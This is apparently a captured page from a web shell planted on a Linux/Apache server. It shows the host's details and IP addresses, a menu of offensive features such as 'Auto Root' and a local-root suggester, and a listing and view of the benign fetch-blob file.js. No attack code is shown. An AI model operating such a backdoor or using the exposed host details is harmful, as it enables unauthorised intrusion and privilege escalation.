Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
fetch-blob /
Delete
Unzip
Name
Size
Permission
Date
Action
file.d.ts
102
B
-rw-r--r--
2023-12-22 10:39
file.js
1.2
KB
-rw-r--r--
2023-12-22 10:39
from.d.ts
1.72
KB
-rw-r--r--
2023-12-22 10:39
from.js
4.33
KB
-rw-r--r--
2023-12-22 10:39
index.d.ts
102
B
-rw-r--r--
2023-12-22 10:39
index.js
7.38
KB
-rw-r--r--
2023-12-22 10:39
package.json
1.61
KB
-rw-r--r--
2023-12-22 10:39
pkgjs-lock.json
746
B
-rw-r--r--
2023-12-22 10:39
streams.cjs
1.57
KB
-rw-r--r--
2023-12-22 10:39
Save
Rename
import Blob from './index.js' const _File = class File extends Blob { #lastModified = 0 #name = '' /** * @param {*[]} fileBits * @param {string} fileName * @param {{lastModified?: number, type?: string}} options */// @ts-ignore constructor (fileBits, fileName, options = {}) { if (arguments.length < 2) { throw new TypeError(`Failed to construct 'File': 2 arguments required, but only ${arguments.length} present.`) } super(fileBits, options) if (options === null) options = {} // Simulate WebIDL type casting for NaN value in lastModified option. const lastModified = options.lastModified === undefined ? Date.now() : Number(options.lastModified) if (!Number.isNaN(lastModified)) { this.#lastModified = lastModified } this.#name = String(fileName) } get name () { return this.#name } get lastModified () { return this.#lastModified } get [Symbol.toStringTag] () { return 'File' } static [Symbol.hasInstance] (object) { return !!object && object instanceof Blob && /^(File)$/.test(object[Symbol.toStringTag]) } } /** @type {typeof globalThis.File} */// @ts-ignore export const File = _File export default File